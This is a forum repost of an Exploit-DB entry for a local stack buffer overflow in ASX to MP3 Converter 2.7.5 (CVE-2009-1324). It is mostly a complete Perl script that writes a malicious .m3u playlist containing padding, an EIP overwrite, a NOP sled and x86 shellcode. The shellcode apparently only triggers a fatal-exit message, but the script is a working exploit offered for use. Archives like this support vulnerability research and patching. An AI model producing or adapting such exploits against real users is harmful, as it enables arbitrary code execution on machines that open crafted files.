- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34921
- Проверка EDB
-
- Пройдено
- Автор
- AMIR TAVAKOLIAN
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2009-1324
- Дата публикации
- 2014-10-07
Asx to Mp3 2.7.5 - Local Stack Overflow
Код:
###########################################################################################
# Exploit Title: ASX to MP3 Converter 2.7.5 stack buffer overflow
# Date: 6 Oct 2014
# Exploit Author: Amir Reza Tavakolian
# Vendor Homepage: http://binarylife.blog.ir/
# Software Link: http://download.cnet.com/ASX-to-MP3-Converter/3000-2168_4-10385919.html
# Version: 2.7.5
# Tested on: windows xp sp 3
#
#
# Special thanks to Mr Michael Czumak (T_v3rn1x) for his tutorial in securitysift.com.
# Thanks Mike. :)
##########################################################################################
#!/usr/bin/perl
my $junk = "\x41" x 35056;
my $eip = pack ('V', 0x73e848a7);
my $nop = "\x90" x 4;
my $shellcode = "\x90" x 25;
$shellcode = $shellcode . "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" .
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" .
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" .
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" .
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" .
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" .
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" .
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
my $junk1 = "c" x 24806;
my $total = $junk.$eip.$nop.$shellcode.$junk1;
my $file = "poc1.m3u";
open (FILE, ">$file");
print FILE $total;
close (FILE);
print "Done.../";
- Источник
- www.exploit-db.com